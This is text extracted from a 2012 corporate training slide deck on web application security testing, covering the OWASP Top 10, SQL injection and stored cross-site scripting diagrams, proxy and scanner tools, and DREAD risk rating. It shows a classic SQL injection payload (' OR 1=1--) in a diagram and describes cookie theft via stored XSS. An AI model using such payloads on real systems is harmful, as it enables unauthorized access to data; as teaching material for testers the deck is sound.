Copyright © 2012 Aware Corporation Ltd.

“Quality is the link to Success”

Copyright © 2012 Aware Corporation Ltd.

• What kind of application security vulnerabilities should be tested?

• Methodology for testing

• Open source tools available

• Prioritizing application security defects

Agenda

Copyright © 2012 Aware Corporation Ltd.

Testing Security

in

Web Applications

Copyright © 2012 Aware Corporation Ltd.

Case Studies

Copyright © 2012 Aware Corporation Ltd.

Web Application

Security Testing

Copyright © 2012 Aware Corporation Ltd.

Different Security Standards

Copyright © 2012 Aware Corporation Ltd.

OWASP Top 10

OWASP (Open Web Application Security Project) is an organization that provides unbiased and

practical, cost-effective information about computer and Internet applications. Project members

include a variety of security experts from around the world who share their knowledge of

vulnerabilities, threats, attacks and countermeasures.

http://www.owasp.org

Copyright © 2012 Aware Corporation Ltd.

OWASP Top 10 Testing

Information Gathering

Configuration Management

Authentication

Session Management

Authorization Business

Logic

Data Validation

Denial of Service

Web Services

Divided in 9 Sub

Categories

And

66 Controls

Copyright © 2012 Aware Corporation Ltd.

• SQL Injection – SQL injection is a technique used to take advantage of non-validated input

vulnerabilities to pass SQL commands through a Web application for execution by a backend database.

• Cross Site Scripting

– Cross-site scripting (XSS) is a type of computer insecurity vulnerability typically found in Web applications (such as web browsers through breaches of browser security) that enables attackers to inject client-side script into Web pages viewed by other users.

• Authentication

– Authentication and session management includes all aspects of handling user authentication and managing active sessions. Authentication is a critical aspect of this process, but even solid authentication mechanisms can be undermined by flawed credential management functions

Top Attacks

Copyright © 2012 Aware Corporation Ltd.

Fir

ewal

l

Hardened OS

Web Server

App Server

Fir

ewal

l

Dat

abas

es

Leg

acy S

yst

ems

Web

Ser

vic

es

Dir

ecto

ries

Hum

an R

esrc

s

Bil

ling

Custom Code

APPLICATION

ATTACK

Net

work

Lay

er

Ap

pli

cati

on L

ayer

Acc

ounts

Fin

ance

Ad

min

istr

atio

n

Tra

nsa

ctio

ns

Co

mm

un

icati

on

Kno

wle

dge

Mgm

t

E-C

om

mer

ce

Bus.

Funct

ions

HTTP

request

SQL

query

DB Table

HTTP

response

"SELECT * FROM

accounts WHERE

acct=‘’ OR 1=1--

’"

1. Application presents a

form to the attacker

2. Attacker sends an

attack in the form data

3. Application forwards

attack to the database in

a SQL query

Account Summary

Acct:5424-6066-2134-4334

Acct:4128-7574-3921-0192

Acct:5424-9383-2039-4029

Acct:4128-0004-1234-0293

4. Database runs query

containing attack and

sends encrypted results

back to application

5. Application decrypts

data as normal and

sends results to the user

Account:

SKU:

Account:

SKU:

SQL Injection

Copyright © 2012 Aware Corporation Ltd.

Application with

stored XSS

vulnerability

3

2

Attacker sets the trap – update my profile

Attacker enters a

malicious script into a web

page that stores the data

on the server

1

Victim views page – sees attacker profile

Script silently sends attacker Victim’s session cookie

Script runs inside victim’s

browser with full access to

the DOM and cookies

Custom Code

Acc

ounts

Fin

ance

Adm

inis

trat

ion

Tra

nsa

ctio

ns

Com

mu

nic

ati

on

Know

ledge

Mgm

t

E-C

om

mer

ce

Bus.

Funct

ions

Cross Site Scripting

Copyright © 2012 Aware Corporation Ltd.

Authentication

Copyright © 2012 Aware Corporation Ltd.

Tools Overview

Copyright © 2012 Aware Corporation Ltd.

Tools • Proxies

– Burp Suite

– Paros

– WebScarab

– Fiddler

• FoxyProxy plugin

• Open source scanners

– Skipfish

Copyright © 2012 Aware Corporation Ltd.

http://portswigger.net/proxy/

Burp Suite

Copyright © 2012 Aware Corporation Ltd.

https://addons.mozilla.org/en-US/firefox/addon/2464/

Foxy Proxy

Copyright © 2012 Aware Corporation Ltd.

http://code.google.com/p/skipfish/

A fully automated, active web application security

reconnaissance tool

* Server-side SQL injection (including blind vectors, numerical

parameters).

* Stored and reflected XSS

* Directory listing bypass vectors.

* External untrusted embedded content.

Skip Fish

Copyright © 2012 Aware Corporation Ltd.

Cheat Sheet

Copyright © 2012 Aware Corporation Ltd.

Cheat Sheet

Copyright © 2012 Aware Corporation Ltd.

Tools Demonstration

Copyright © 2012 Aware Corporation Ltd.

• Discovering vulnerabilities is important, but just as

important is being able to estimate the associated risk to

the business.

Risk = Likelihood * Impact

RISK

Copyright © 2012 Aware Corporation Ltd.

Prioritizing RISK

Copyright © 2012 Aware Corporation Ltd.

D

R

E

A

D

amage potential

eproducibility

xploitability

ffected users

iscoverability

Threat Risk

Copyright © 2012 Aware Corporation Ltd.

Copyright © 2012 Aware Corporation Ltd.